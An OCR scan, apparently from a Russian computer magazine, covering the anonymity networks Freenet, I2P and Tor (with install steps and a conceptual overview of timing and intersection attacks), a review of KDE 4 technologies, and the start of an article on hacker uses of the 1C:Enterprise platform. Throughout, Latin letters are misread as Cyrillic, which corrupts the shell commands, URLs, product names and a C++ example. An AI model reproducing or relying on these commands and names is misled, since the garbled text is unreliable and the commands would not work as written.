ли он в ихлокальном хранилище и, если нет, отправляют 
запрос своим соседям. Послетого какфайл будет найден 
в локальном хранилище одного из соседей, он будет отдан 
обратно по цепочке запросившему файл узлу. При этом 
каждый изузлов, участвующих в передаче файла, кэширует 
его в своем хранилище. 

Для большей скорости и лучшей защищенности описанная 
схема также включает в себя дробление файла на множест- 
во мелких блоков и их шифрование, атакже динамические 
списки ключей, которые содержат ближайшие соседи узла. 
В частности, именное их помощью происходит поиск сосе- 
дей (хотя адреса первых соседей вшиты в клиент]. 

Егеепеі: — это нетолько файлообменная сеть и защищен- 
ное хранилище информации. На его базе реализовано 
несколько приложений для работы в анонимной сети, среди 
которых: 

* Ргозб — своего рода клиент форумов, а также 
файлообменник , позволяющий заливать файлы во 
Ргеепеб , получая в ответ ключ доступа . 

* ^Зібе — программа для создания собственных 
«фрисайтов», то есть сайтов, размещенных внут- 
ри Ргеепеб-сети . 

* Тйам — программа для работы с группами фай- 
лов . 

* бгеетиіеб — файлообменник, обеспечивает ша- 
ринг файлов с «загрузкой по требованию». 

* Плагин Ргеешаіі — анонимная электронная поч- 
та . 

Ксожалению, из-за слишком больших задержек в передаче 
данных для Ргеепеі: невозможно реализовать интерактив- 



ные или требующие быстрого ответа приложения. Поэтому 
Егеепеі-сайты статичны и скудны на оформление, а в списке 
приложений нетчата или ІМ-пейджера. 

Клиент Ргеепеі: написан на Заѵа, поэтому перед скачива- 
нием программы ты должен обзавестись соответствующей 
виртуальной машиной: 

$ зибо арб-деб іпзбаіі зип-заѵаб-^ге 
$ зибо ирбабе-з аѵа-аібегпабіѵез -з заѵа-б-зип 

Далее скачай и установи программу: 

$ мдеб Пббр : / /боѵтіоабз . бгеепебргоз есб . огд/ 
а1рНа/іпзба11ег/петл_іпзба11ег . д аг 
$ заѵа -з аг пем_іпзба11ег . д аг 

Следуй инструкциям. После окончания установки инстал- 
лятор запустит клиент Ргеепеі: (если этого не произошло, 
перейди в каталогсустановленной программой и запусти 
скрипт гип. бЫ и откроет браузер, в котором появится ѴѴеЬ- 
интерфейс, предназначенный для настройки твоего узла. 
После окончания настройки ты получишь доступ кстранич- 
ке ЫТр://1 27.0.0.1 :8888. Это страница РРгоху, Егеепеі-прило- 
жения для проксирования запросов браузера во Егеепеі- 
сеть. На странице будут перечислены ссылки на популярные 
Егеепеі-сайты. Для конфигурирования Егеепеі-клиента 
предназначена страничка Ьббр://1 27.0.0. 1 :8888/сопіід/. Все 
возможные опции прокомментированы, поэтому нет нужды 
отдельно упоминать о них. 

НЕВИДИМЫЙ ИНТЕРНЕТ 

Ргеепеі: обеспечивает очень высокий уровень анонимности 
в рамках своей сети, но создает существенные задержки 
при работе и не позволяет использовать стандартные ТСР/ 
ІР-приложения внутри своей сети. Проект І2Р (ІпѵізіЫе 
ІпбетеТ РгоіесТ/РгоТосоІ] решаетэти проблемы, создавая 
болееудобную в использовании внутреннюю сеть, совсем в 
немногих аспектах уступающую Ргеепеі: по уровню аноним- 
ности. 

В отличие от Ргеепеі, І2Р не является файлообменной 
сетью. Принцип ее работы больше напоминаетТог, а потому 
І2Р гораздо быстрее Ргеепеі:. Крометого, І2Р позволяет 
использовать протокол ТСР/ІР в своих сетях, а также имеет 




• Тогбыл пред- 
ставлен Роджером 
Динглдайном, 

Ником Мэтьюсоном и 
Паулом Сиверсоном 
на 13-м ІІ5ЕІЧІХ сим- 
позиуме по безопас- 
ности, прошедшем 13 
Августа 2004 года. Его 
исходный код опубли- 
кован подлицензией 
В50. 

• Ѵібаііа и ТогК — 
приложения для 
настройки Тог, напи- 
санные с использо- 
ванием библиотеки 
СК4. 

• Тог может быть 
использован не 
только в качестве 
прокси для доступа к 
интернет-серверам. 
Внутри сети То г также 
существуют ресур- 
сы (домен .опіоп], 
которые гарантируют 
анонимность как кли- 
ента, так и сервера. 




> СІѴСІ 



На прилагаемом к 
журналудискеты 
найдешь послед- 
нюю версию ЕіѵеСО 
Іпсодпііо. 
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«выходные узлы», которые можно исполь- 
зовать для выхода во внешнюю сеть (эта 
особенность превращает І2Р в конкурента Тог]. 
Основа работы І2Р — «луковые маршрутизато- 
ры», роль которых выполняет каждый узел сети. 
Отправляемоеузлом сообщение проходитдве 
цепочки (туннеля втерминологии І2Р], первый 
из которых строится узлом-отправителем, а 
второй - узлом-получателем сообщения. Во 
время передачи сообщение подвергается 
многоуровневому шифрованию (сквозное, 
туннельное и транспортного уровня], конечные 
узлы, представленные идентификаторами, не 
имеющими связи с реальными ІР-адресами, 
проходят криптографическую аутентификацию. 
Туннели перестраиваются каждые 10 минут. 
І2Рдопускаетвыходза пределы своей сети с 
помощью специальных «выходных серверов», 
которые могут использоваться для анонимного 
веб-серфинга. Крометого, существуют шлюзы для 
выхода во РгеепеРсеть. Арсенал приложений, 
доступных для работы в сети І2Р, включаетвсебя: 

* І2РЗпагк — стандартный торрент- 
клиент для сетей 12 Р. Устанавливает- 
ся по умолчанию. 

* І2Р-ВТ — модификация ВібТоггепб 
3.4.2 для 12 Р . 

* І2РВи^из — клиент КиРиз для І2Р. 



* І2Ркех — дпиВеІІа-клиент Рйех для 
І2Р. 

* іМиІе — модификация еМиІе для І2Р. 

* Зизішаіі — свободный анонимный 
почтовый сервис для 12 Р. 

* Зупсііе — приложение для блоггеров . 

Некоторые открытые программы, например, 
Агигеиз, включают в себя плагины для работы 
в сети І2Р. 

Каки клиент сети Ргеепеі, клиент І2Р написан 
на Заѵа и снабжен инсталлятором. Поэтому для 
установки необходимо выполнить два простых 
шага: 

$ хѵдеб Ъ.ббр: / /шіггог . І2р2 .бе/ 
і2ріпзба11-0 .7.7. ехе 
$ ^аѵа -^аг . /і2р_іпзба11-0 . 7 . 7 . ехе 

Следуй инструкциям, выбери язык, согласись 
с условиями лицензии, укажи путь установ- 
ки. После ее окончания перейди в каталоге 
установленным приложением и запусти его с 
помощью команды: 

$ . /і2ргоибег збагб 

Панельуправления приложением находится 
по адресу: ШрУЛ 27.0.0.1 :7657/і псіех. |зр . Адрес 



НТТР-п рокси : 127.0.0.1 :4444. Внутренние сайты 
І2Р находятся в домене . І2р, их список доступен 
на сайте огіоп . І2р, внутренние поисковики: 
зеагсб.і2р и еерзіііез. І2р. Для разрешения имен 
используется те кетовый файл, по умолчанию 
его содержимое весьма скудно. Чтобы попол- 
нить его, добавь строку ШрУ/огіоп. і2р/Ьо5І:5. 

Іхі в раздел управления подписками ( ЫЧрУ/ 
[осаІбозРУббУ/зизісІпз/зиЬзсгірІіопздзр ]. 

КАРМАННАЯ АНОНИМНОСТЬ 

ЫѵеСО ІпсодпКо ( ѵѵѵѵѵѵ.апопѵтКѵапѵѵѵЬеге.сопп/ 
іпсодпііо/ ] предназначен специально для пара- 
ноидальных пользователей сети. Он включает в 
себя множество самых разнообразных инстру- 
ментов, обеспечивающих полную анонимность 
при работе в интернет. Ключевую роль среди 
нихзанимаетклиентТог, который интегрирован 
с Рігебох с помощью ТогЬиІЧоп. Все остальные 
приложения, способные использовать50СК5- 
или НТТР-прокси, настроены на его использо- 
вание. Среди других инструментов доступны: 

* РігеРох + Тог + ТогЬиббоп — аноним- 
ный Ѵ\ЛШ. 

* ТгиеСгурб — шифрование файлов и 
разделов . 

* Епідшаіі — ТйипбегЬігб-расширение 
для шифрования писем. 
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Принцип луковой маршрутизации на примере Тог 



* РігеСРС — плагин РігеТох, предназначенный для исполь- 
зования шифрования совместно с почтовыми клиентами, 
расположенными в МеЬ. 

* СпиРС — реализация ОрепРСР. 

* КееРаззХ — менеджер паролей. 

* Мішіпіоп — клиент анонимной почтовой системы. 

При записи на 115В дистрибутив способен шифровать все пользова- 
тельские настройки и пароли. Во время выключения питания опера- 
тивная память полностью перезаписывается, чтобы избежать возмож- 
ности восстановления данных. МАС-адрес сетевой карты может быть 
автоматически изменен. 

АТАКИ НА АНОНИМНЫЕ СЕТИ 

Каки любые другие виды сетей, анонимные сети также подвержены 
различного рода атакам. Здесь можно выделить: 

* Тайминг-атаки 

* ВгиСеТогсе-атаки 

* Атака пресечения 

Тайминг-атака основана на поиске и анализе повторяющихся 
паттернов в частоте отправки сообщений. Защита оттакого вида 
атак предусмотрена в новых версиях всех описанных в статье систем 
и включает в себя разбивку сообщений на блоки фиксированной 
длины, внесение случайных задержек и их перемешивание перед 
отправкой. 

Вгійеіюгсе-атака носит скорее теоретический, нежели практи- 
ческий характер. Осуществить ее можеттолько сторонний наблю- 
датель, способный прослушивать интернет-трафик в глобальных 
масштабах и обладающий возможностями для его обработки. 
Теоретически такой наблюдатель вполне может определить соот- 
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Настройка расширения ТогЬииоп 



ветствие между отправленным сообщением и его отправителем 
и/или адресатом. 

Атака пресечения основана на данных о моментах продолжительности 
сеансов связи узлов сети. Для ее проведения также необходим анализ 
трафика в глобальных масштабах. 

Вообще говоря, безопасность анонимной сети напрямую зависит 
от количества ее участников. Чем больше узлов вовлечено в сеть, 
тем труднее отследить потоки информации и их отправителей. Это 
справедливо для сетей Ргеепеі и І2Р, в которых любой клиент также 
выступает в роли маршрутизатора трафика. Сеть Тог, напротив, 
делает различия между клиентами и серверами (маршрутизатора- 
ми], снимая нагрузку с клиентов, но существенно сокращая свои 
масштабы (не каждый пользователь клиента установит на свой узел 
сервер], □с 
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Обзор 7 ключевых технологий КОЕ 4 

КРЕ 4 включает в себя 7 ключевыхтехнологий. также известных как 
«Столпы КРЕ» (Ріііагз оі КРЕ). которые позволили ему выйти на лидиру- 
ющие позиции потехнологичности и продуманности среди всех окруже- 
ний рабочего стола. В этой статье я познакомлютебя с этими технологи- 
ями и докажу, что КРЕ 4 вовсе не «ошибка природы», а гигантский шаг 
вперед. 



ИТАК, 7 СТОЛПОВ Ш 4: 

• Зоіісі — АРІ и «прослойка» для абстракции 
наджелезом. 

• РНопоп — мультимедиа АРІ. 

• йесіЬеІ — сервис и АРІ для организации 
общения в режиме реального времени. 

• Акопасіі — фреймворк РІМ. 

• Ыерогтшк — семантический рабочий стол. 

• Ріазта — фреймворк рабочего стола. 

• Охудеп — новая тема рабочего стола. 

50І.Ш 

КРЕ 4 способен работать на множестве опера- 
ционных систем, включая различные варианты 
В5Р и ѴѴі псІо\л/5. Каждая из этих ОС требует 
собственного подхода к работе с оборудовани- 
ем и вынуждает программистов приложений 
придумывать различные прослойки для работы 
с ним, учитывающие особенности различных 
ОС и их версий. Разрабатывая приложения для 
среды КОЕ 4, программист не обязан выдумы- 
вать та кие прослойки самостоятельно, а может 
положиться на Зоіісі АРІ. 



Зоіісі — это обертка вокруг средств управления 
железом, которая позволяет разработчикам 
приложений использовать единый АРІ для 
доступа к оборудованию компа в любой ОС. 

Зоіісі не идет на замену НАС и другим средст- 
вам, он лишьсоздаетудобный интерфейс ких 
функциональности, позволяя использовать 
самые разные движки для доступа коборудова- 
н ию, такие как НАС, ІЧеІѵѵогкМападег и ВІиеТ.. 
При этом замена существующего движка или 
добавление нового не повлечетза собой пере- 
писывание приложений, использующих Зоіісі , 
потребуется обновить лишь его самого. 
Пользователям Зоіісі может дать не меньше 
удобств. В КИЕ 4 работа с оборудованием про- 
исходит гораздо более гладко и умно. Найдя в 
системеустановленный ІЧеІѵѵогкМападег, КИЕ 
автоматически начнет использовать его воз- 
можности для поиска и настройки сетей. Среда 
способна самостоятельно находить более 
высокоскоростные каналы связи и переклю- 
чаться на их использование, при подключении 
флешки может быть произведен автоматичес- 
кий бэкап ее содержимого на жесткий диск. 



И, конечноже, все это работает одинаково в 
любой поддерживаемой ОС. 

РНСМСМ 

С появлением аРіз КИЕ 2 обзавелся собст- 
венным звуковым сервером и АРІ, которые 
позволили разработчикам приложений абс- 
трагироваться от конкретных устройств вывода 
звука, а пользователям — услышать звук сразу 
из нескольких источников (тогда еще ни Ыпих, 
ни ВЗИ не умели микшировать звуковые потоки 
программно). 

аПіз продержался в КОЕ до последних выпус- 
ков КОЕ 3, но из-за вложенных ограничений, 
таких как отсутствие поддержки видео и не- 
возможность использования других звуковых 
движков, был выкинут из КОЕ 4 и заменен на 
новый мульти медиа -фреймворк Рбопоп. 

В отличие отаРіз, РЬопоп более комплексное и 
гибкое решение, благодаря которому пользо- 
ватели получаюттонкий контроль над источ- 
никами и приемниками звука, могут управлять 
накладываемыми эффектами, в один кликна- 
страивать самые изощренные схемы прохожде- 
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ния звука (например, направитьзвукотЗкуре в 
наушники, а уведомления от Кореіе — 
в колонки], использовать единый пункт 
настройки звука (приложения, использующие 
РЬопоп, вообще не имеют собственных средств 
настройки звука], задействовать все преиму- 
щества Зоіісі для автонастройки устройств 
вывода звука (например, при подключении 
ІІ5В-наушников Рбопоп может автоматически 
переключать Зкуре на вывод звука через них]. 
Разработчикам РЬопоп даетне меньшую сво- 
боду и удобство. ЕгоАРІ поддерживает не толь- 
ко вывод звука, но и видео, при этом АРІ очень 
прости компактен. Например, для проигры- 
вания звукового файла с помощью Рбопоп АРІ 
достаточно всего четырех строк кода на С++ 
(тогда как в случае с аРіз требовалось 30]: 



тесііа = пем МесІіаОЬз есС (Ыгіз) ; 
соппесС (тесііа, ЗІСЫАЬ ( ііпізЬес! ( ) ) , 
ЗЬОТ ( зІоСРіпізЬесі ( ) ) ) ; 
ше<ііа->зеССиггепСЗоигсе ( " /Ьоше/ 
изегпаше/шизіс/РіІепаше . одд" ) ; 
тесІіа->р1ау ( ) ; 

Отличительная особенность Рбопоп за- 
ключается также и в том, что он не исполь- 
зует единственный встроенный движок 
вывода аудио и видео, а может использо- 
вать его самые разные варианты, начиная 
отХіпе и ВЗітеатег на II N IX- платформе 
и заканчивая 0ігес1:5Ьоѵѵ на ѴѴіпсІоѵѵз 
(переключение между которыми может 
быть произведено на лету, без остановки 
воспроизведения]. 



ОЕСІВЕІ. 

КРЕ4обзавелся и собственным фреймворком 
для организации общения в режиме реально- 
го времени, включая голосовую и видеотеле- 
фонию, ІР-телефонию (ѴоІР), текстовые чаты и 
обмен сообщениями (ІРС, I СО, ЗаЬЬег]. 
РесіЬеІоснован на ТеІераЕзуАРІ (проект 
Ітеесіезкіюр.огд ) и использует совместимую с 
ним библиотеку Та ріоса. Ему подчинено все, 
что относится к мгновенной доставке сооб- 
щений между двумя и более пользователями. 
Любой компонент КРЕ 4, способный предо- 
ставитьтакой функционал, может (и должен) 
использовать РесіЬеІ. 

РесіЬеІ существен но упрощает программи- 
рование приложений, поддерживающих фун- 
кции обмена мгновенными сообщениями, и 
позволяет разработчику сконцентрироваться 
на функциональности приложения, а не на от- 
лове ошибоки реализации функциональности, 
специфичной для обмена сообщениями. 

АКОЫАОІ 

В КРЕ 3 приложения, управляющие 
персональной информацией, вынуждены 
были хранить свои данные раздельно, в 
результате чего часть информации дубли- 
ровалась. Кипа і I, Копіасі: и другие про грам- 
мы, управляющие личной информацией, 
использовали собственный методдоступа к 
ней, поэтому данные были не согласованы, 
часто дублировались, а программистам 
приходилось проделывать множество 
дополнительной работы для поддержания 
несогласованных между собой, но повто- 
ряющих функциональность, систем. В КРЕ 
4 управление персональными данными 
организовано совершенно иначе, и здесь за 
ее хранение отвечает Акоп а б і. 

Говоря простым языком, Акопабі — это фрейм- 
воркРІМ (РегзопаПпіюгтаЕоп Мападетепр 
Управление Персональной Информацией], 
который представляет собой клиент-сер- 
верную инфраструктуру, предназначенную 
для хранения персональной информации, 
обрабатываемой различными приложениями, 
и получения доступа к ней. 

Акопабі технологичен, а это значит, что кроме 
простого хранения данных, он предоставляет 
программистам быстродоступный кэш, обла- 
даетсобственным языком запросов, позволяет 
производить прозрачную синхронизацию 
данных с другими ресурсами, можетбыть рас- 
ширен для поддержки новыхтипов данных и 
ресурсов, предлагает простой и понятный АРІ 
и многое, многое другое. По сути Акопабі дает 
программистам все, что нужно для реализации 
хранения персональных данных пользователя 
в их программах. 

Что до простых пользователей, то благода- 
ря Акопабі они получают весьма полезные 
свойства: приложения могут не дублировать в 
памяти данные, сохраняя ее для других нужд, 
синхронизация данных происходит полностью 
в фоновом режиме, а приложения всегда 
«видят» актуальную информацию. 



МНЕНИЕ 



Порой случается так, что решения проблем, накопленные годами, порождают новые про- 
блемы, и эту цепочку совсем не просто разорвать. Выход один — сломать все и написать код 
с нуля.Такпримерно и произошло со средой КОЕ4, разработчики которой показали, чтоони 
готовы пойти на кардинальные изменения, ведь даже совместимость с предыдущей версией 
не гарантируется. 

Началотретьей версии КОЕ положено в апреле 2002, за 7лет развития много чего изме- 
нилось какв самом проекте, таки в ІТ-сфере. Содной стороны — появилось новое обору- 
дование, технологии, ОС и такдалее. Ас другой стороны — код некоторых компонентов и 
приложений (Кіскег, КбезкЬр, аВіз] не менялся еще со времен КОЕ 2 и добавлять новое, не 
нарушив старое, было проблематично, ато и вовсе невозможно. Поэтому все новинки, вроде 
ЗирегКагатЬа, не встраивались, а наслаивались нато, что есть. Какты понимаешь, это не 
могло положительно сказаться на стабильности, совместимости и производительности. Кроме 
того, многие идеи, например рабочий стол — папка, оказались не совсем удачны и ограничи- 
вали пользователя. Для программистов КРЕЗ являлась мудреной головоломкой, требовав- 
шей каждый раз «индивидуального» подхода, и становилось все сложнее добавлять новые 
вкусности в заваренную кашу. 

В КОЕ4учтены все пожелания и ошибки, втом числе изменена структура проекта. Модуль- 
ность позволит быстро включать новые функции и постепенно отказаться отустаревших 
решений. 

Недоработанность первых версий КОЕ 4 привела ктому, что начался отток пользователей в 
6Ы0МЕ (который крелизу2.30, возможно, окажется втакомже положении, каки КОЕ 4.0), но 
за 2 года была проведена колоссальная работа, и пользователи начали «возвращаться» в эту 
среду. 

Владимир «ІигЬіпа» Ляшко (ѵ.ІигЬіпагадтаіІ.сот), автор статьи «Новые кеды для гламурно- 
го юниксоида», опубликованной в январском номерезсза 2008 год. 
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Архитектура Акопа сіі 



ЫЕРОМІЖ 

ЫЕРОМІЖІЫеІѵѵогкесІ ЕпѵігоптепіЧог 
Регзопаіігесі, Опіоіоду-Ьазесі Мападетепіоі 
ІІпіІіесІ Кпоѵѵіебде, Сетевое окружение для персо- 
нализированного и основанного на Онтологиях 
управления Единым Знанием] — это специфика- 
ция, описывающая социальный семантический 
рабочий стол, о котором можно прочитать на стра- 
нице пещшщкъетюг^^ 
не имеет отношения к КОЕ кактаковому. Однако 
реализация этой спецификации для КБЕ4очень 
интересна и напрямую касается темы статьи. 
Несмотря на пугающую и кажущуюся 
совершенно бессмысленной расшифровку 
термина, идея семантического десктопа и 
Ыеротик достаточно проста и сводится к 
тому, чтобы получить рабочий стол, в котором 
доступ к информации будет производиться 
семантическими средствами. Говоря други- 
ми словами, втаком окружении пользователь 
сможет выполнить запрос вида «Прошло- 
годние фотки с Анькой» и получить ответ в 
виде открытого просмотрщика фотографий, 



содержащего эти самые фотографии. 

Чтобы добиться этого, КБЕ-реализация 
Ыеротик использует индексирующий инстру- 
мент Зігіді, анализирующий новые файлы и 
извлекающий из них метаданные (например, 
на основе трЗ-тегов]. В дополнение метадан- 
ные могутбыть созданы самим пользователем, 
используя, например, файловый менеджер 
ОоІрЬіп (какты могзаметить, в его правой 
панели отображается нетолько информация о 
файле, но и интерфейс выставления рейтинга, 
добавления комментариев и тегов). Нако- 
пив достаточную базутегов, комментариев и 
рейтингов, пользователь можетинициировать 
поиск нужных файлов, просто набравтег в 
КРиппег(АІШР2). 

На данный момент Ыеротик за кончен не 
полностью и по умолчанию отключен. Чтобы 
проверить его в действии, необходимо пе- 
рейти в настройки (Зузіет ЗеШпдз), открыть 
вкладку Абѵа псе 6, выбрать элемент Безкіор 
ЗеагсЬ и отметить галочками пункты ЕпаЫе 
Ыеротик Бета пЬс БезкШр и ЕпаЫе Зігіді 



РЬАЗМА И ПОДДЕРЖКА ВИДЖЕТОВ 



• Родные плазмойды, написанные на языках С++, ЧаѵаЗсгірІ, ВиЬу или РуШоп 

• Ооодіе Оасідеіз 

• Темы ЗирегКагатЬа 

• Гаджеты ОЕсфе, совместимые с гаджетами Е6\е и модулями Е 1 7 

• Виджеты Мае 05 X 

• Веб-виджеты с поддержкой НТМЕ и ЧаѵаЗсгірІ 



ѵК 




Рабочий стол одного из разработ- 
чиков КРЕ4.4 



Безкіор Еііе Іпбехег. Перейдя на вкладку 
Абѵапсеб ЗеШпдз, можно выбрать каталоги 
для индексирования. После нажатия кнопки 
Арріу Зігіді начнет действовать и сообщит 
о проделанной работе с помощью стан- 
дартного уведомления. После этого можно 
запустить КРиппег и набрать имена тегов 
для поиска. 

РІ.А5МА 

Во времена КИЕ 1 рабочим столом управлял 
файловый менеджер КОЕ. Именно он был 
ответственен за создание иконок на рабо- 
чем столе и панели задач. С выходом КИЕ 2 
файловый менеджер распался на несколько 
независимых приложений, управляющих раз- 
ными компонентами рабочего стола: файловый 
менеджер, предназначенный для навигации 
по файловой системе, панели, исполняемые в 
рамках отдельных процессов, и рабочий стол, 
хранящий иконки. В КБЕЗ к этой тройке доба- 
вилась еще и ЗирегКагатЬа — неофициальное 
дополнение к рабочему столу КОЕ, позволяю- 
щее размещать на нем виджеты. 

Со временем такое положение дел становилось 
все более неудобным какдля разработчиков, 
так и для пользователей. Компоненты рабочего 
стола были плохо связаны друге другом и не 
могли в полной мере консолидироватьдейст- 
вия по поддержке рабочего стола. Пользовате- 
ли жаловались на недостаток эффектов рабоче- 
го стола и его несовременность. Апплеты были 
слишком примитивны и могли быть написаны 
только на языке С++. Эти проблемы в конечном 
итоге привели к полному избавлению КБЕ4от 
КБезкІор, Кіскег и ЗирегКагатЬа и интегра- 
ции в него новой технологии, получившей имя 
Ріазта. 

Ріазта — это своего рода фреймворк рабочего 
стола, который объединяет воедино сам рабо- 
чий стол, панели, иконки, виджеты и апплеты. 
Исполняясь в рамках одного процесса, Ріазта 
делает рабочий стол КОЕ 4 интегрированной 
средой с общим АРІ для разработчиков и гар- 
моничным внешним видом для пользователей. 
Благодаря глубокой интеграции компонен- 
тов, Ріазта предоставляет функциональ- 
ность, недоступную ни в одной другой среде. 
Ведь на самом деле рабочий стол Ріазта не 
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Включаем перотик 




Ріазта для нетбуков: менюзапѵска 
приложений 



Ріазта для нетбуков: газетный вид 




делится на множество различных компонентов, вроде 
панелей, иконок, апплетов и т.д., а представляет собой 
среду, состоящую из компонентов одного вида — видже- 
тов рабочего стола, называемых плазмойдами. В Ріазта 
виджеты везде: это и меню, и иконки, и трей, и часы, 
и панель, и обои рабочего стола (это так называемые 
«сдерживающие» виджеты, способные содержать в себе 
другие виджеты). 

Для пользователя, конечно, вся однотипность интерфейса 
скрыта, и он по-прежнему видит панели, иконки, виджеты 
рабочего стола (в классическом понимании), однако стоит 
ему начать использовать К0Е4, какой заметит, что любой 
виджет можно легко превратить в апплет, просто перетащив 
его на панель, или выполнить обратную процедуру, выта- 
щив, к примеру, трей из панели и поместив его на рабочий 
стол, рядом со сводкой погоды и корзиной. 

Ріазта интегрирована со скриптовым фреймворком Кгозз, 
поэтому плазмойды могут быть написаны нетолько на род- 
ном для КОЕ языке С++, но и на ОаѵаЗсгірІ, ВиЬу или Руібоп. 
Болеетого, в Ріазта интегрировано несколько библиотек, 
обеспечивающих совместимость с виджетами других сред, 
поэтому Ріазта также поддерживает и гаджеты боодіе и 
виджеты Мае 05Х (они, однако, не обладают гибкостью 
плазмойдов и могут быть размещены только на рабочем 
столе). 

Ріазта обеспечивает возможность произвольного масш- 
табирования и вращения плазмойдов. Рабочий стол КБЕ 
4 действительно легко масштабируется и может выглядеть 
одинаково на разных дисплеях и при разных разрешениях. 
При этом не возникает каких-либо проблем со шрифтами, 
разрешением иконокит.д. Рабочий стол в буквальном 
смысле растягивается и сжимается. 

Масштабируемость рабочего стола и виджетов, а также 
возможность вкладывания виджетов друг в друга позволяет 
Ріазта бытьдействительноуниверсальным решением 
для всехтипов интерфейса. Например, в рамках проекта 
РІазта-ЫеіЬоок планируется реализовать специальный 
тип интерфейса для нетбуков. Чтобы понять, что это не 
просто перетаскивание панелей на другие места, а действи- 
тельно новый интерфейс, достаточно просто взглянуть на 
скриншоты. 

Крометого, в рамках проекта боодіе Зиттегоі Собе Алес- 
сандро Диафериа (Аіеззапбго Оіаіегіа) создал интерфейс 
медиацентра, полностью основанный на Ріазта. В качестве 
экспериментов с помощью Ріазта были созданы даже 
интерфейсы приложений. 

Кроме красоты, универсальности и глубокой внутренней 
проработанности, Ріазта вносит в КБ Е 4 еще одно очень 
полезное и удобное в работе свойство: асііѵііу. Актив- 



ностью в КБЕ 4 называется какой-либо вид деятель- 
ности. Идея втом, что работая за компом, пользователь 
в один момент времени заняттолько какой-то одной 
деятельностью, например, разработкой ПО, игрой в игры, 
просмотром фильмов, браузингом сети и т.д. Для любого 
вида деятельности в КБЕ есть набор виджетов, которые 
пользователь может разместить на своем рабочем столе. 
Загвоздка только в том, что если он «повесит» все вид- 
жеты, которые только могут ему пригодиться, на рабочий 
стол одновременно, то это не только будет неудобно, такое 
большое количество виджетов просто не поместится на 
экране. Активности позволяют создать индивидуальный 
набор виджетов для каждого рабочего стола, переключа- 
ясь между которыми, пользователь будет переходить от 
одного вида деятельности кдругому. 

Для создания активности кликни по эмблемке в правом 
верхнем углу экрана и выбери пункт меню Хоот ОиЕ Когда 
рабочий стол отодвинется и станет в четыре раза меньше 
экрана, нажми АсИ Асііѵііу. После этого рядом с существу- 
ющим появится новый рабочий. Нажми кнопку Хоот Іп под 
новым рабочим столом, чтобы перейти кего использова- 
нию. Все добавленные на него виджеты будут индивидуаль- 
ны и не повлияют на другие рабочие столы. 

Перемещаться между активностями с использованием 
кнопокЕоот Іп и Еоот Оиі не оченьудобно, поэтому 
активности можно привязать к виртуальным рабочим 
столам. Для этого вновь нажми Еоот Оиі, затем Сопіідиге 
Ріазта и поставь галочку напротив Оіііегепі асііѵііу Іо г 
еасб сіезкіор. 

ОХѴбЕЫ 

Охудеп не может идти ни в какое сравнение с другими техно- 
логиями КБЕ4, но, тем не менее, является важной состав- 
ляющей новой версии среды. В двух словах: Охудеп — это 
полностью новаятема рабочего стола КБЕ4, включающая 
в себя 014-тему, новые рамки окон, тему Ріазта, новые 
иконки, курсоры и т.д. Имя Охудеп (кислород) указывает на 
то, что разработчики хотели «вдохнуть свежего воздуха в 
рабочий стол КБЕ 4». 

выводы 

Какты смог убедиться, КБЕ4 вовсе не провал, а очень 
серьезный рывок вперед. Многие его компоненты на- 
столько инновационны и занимательны, что им можно 
посвятить не одну отдельную статью. При этом сама 
среда постоянно совершенствуется и улучшается, и 
можно предположить, что к выходу КБЕ 4.8 она станет 
не менее стабильной и богатой на функционал, чем 
КОЕ 4.3. =н= 




> іпіо 



• Сами разработчики 
КБЕ, не лукавя, назы- 
вают похожий на орех 
значок в углу экрана 
не иначе как кешью. 
Кстати, в КБЕ 4.5 его 
не будет. 

• Официально 
фреймворк Рбопоп 
был представлен как 
часть КБЕ 4.0 в янва- 
ре 2008-го. В этом же 
году он был включен в 
релиз 01 4.4. 
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ПЛАТФОРМА 1С:ПРЕДПРИЯТИЕ СЕГОДНЯ УСТАНОВЛЕНА В КАЖДОЙ ВТО- 
РОЙ ОРГАНИЗАЦИИ. АДМИНЫ ВЛЮБИЛИСЬ В ЭТУ СИСТЕМУ ЗА ПРОСТОТУ 
АДМИНИСТРИРОВАНИЯ И ЛЕГКОСТЬ РАЗВЕРТЫВАНИЯ. ПРОГРАММИСТЫ 
БАЛДЕЮТ ОТ ВОЗМОЖНОСТИ ДОРАБОТКИ/РАЗРАБОТКИ КОНФИГУРАЦИЙ 
ПОД КОНКРЕТНЫЕ НУЖДЫ. ПОЛЬЗОВАТЕЛИ В ВОСТОРГЕ ОТ ПРОДУМАН- 
НОГО И СТАНДАРТИЗИРОВАННОГО (СРЕДИ ПРОДУКТОВ 1С) ИНТЕРФЕЙСА. 
А НТО ПРЕДСТАВЛЯЕТ ЭТА ПЛАТФОРМА ДЛЯ Х-СОВМЕСТИМОГО НЕЛА? 
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ІС'ОК МНОГО ВСЯКИХ ЕСТЬ 

Я не знаю, имел ли ты опыт работы с платформами 1 С:Предприятие, 
но, чтобы мы говорили стобой на одном языке, рассмотрим вкратце 
основные понятия. Итак, для начала стоитусвоить, что все плат- 
формы 1 С:Пред приятие условно можно разделить на две большие 
группы: 7.7, 8.x. Какты мог догадаться, название групп характеризует 
номер версии. 

Версия 7.7 на сегодняшней день считается самой старой из под- 
держиваемых. Несмотря на старость и отстойность, платформа этой 
версии не теряет свою популярность идосихпормногие предприя- 
тия юза ют именно ее. Причин тому много. Одна из главных — труд- 
ность миграции на новые версии. Все особенно усложняется, если 
в компании используется нетиповая конфигурация, а самописное 
решение. В таких случаях без отряда программистов не обойтись. Ну 
да ладно, нас эта проблема мало волнует, нам интересна обратная 
сторона медали. 

В платформе 1 С:Предприятие есть встроенный язык, посред- 
ством которого и выполняется доработка/разработка конфи- 
гурации (то есть программного решения]. Так вот, в версии 
7.7 этот язык убог и сотворить на нем что-то действительно 
хакерское практически нереально. Заметь, я сказал «практи- 
чески». В реале же лазейка есть — использовать различные 
внешние компоненты. Внешняя компонента — это специально 
разработанная динамическая библиотека, которая может быть 
подгружена в адресное пространство платформы, после чего 
ее функции можно вызывать на встроенном языке. Разработка 
компонент — процесс не шибко сложный, он подробно описан 
в многочисленных мануалах, которых в инете пруд пруди. В 
качестве среды разработки таких компонент можно заюзать 
либо ОеІрЫ.либо тот же Ѵі 5 и а I С++. Рассматривать написание 
компоненты в рамках этой статьи мы не будем. Почему? Увы, 
данный способ слишком тяжел в эксплуатации с практической 
точки зрения. Если в системе твои права обрезаны по самые «не 
хочу», то подсунуть левую ОН вряд ли удастся. К тому же, если в 
своей библиотеке ты за юзаешь «полезные» ѴѴіпАРІ- функции, то 
даю 99% вероятности, что проактивная защита установленного 
антивируса будет вопить, как потерпевшая. 

С линейкой платформ версий 8х все совсем иначе. Они обладают 
богатыми возможностями, а встроенный язык годится не толь- 
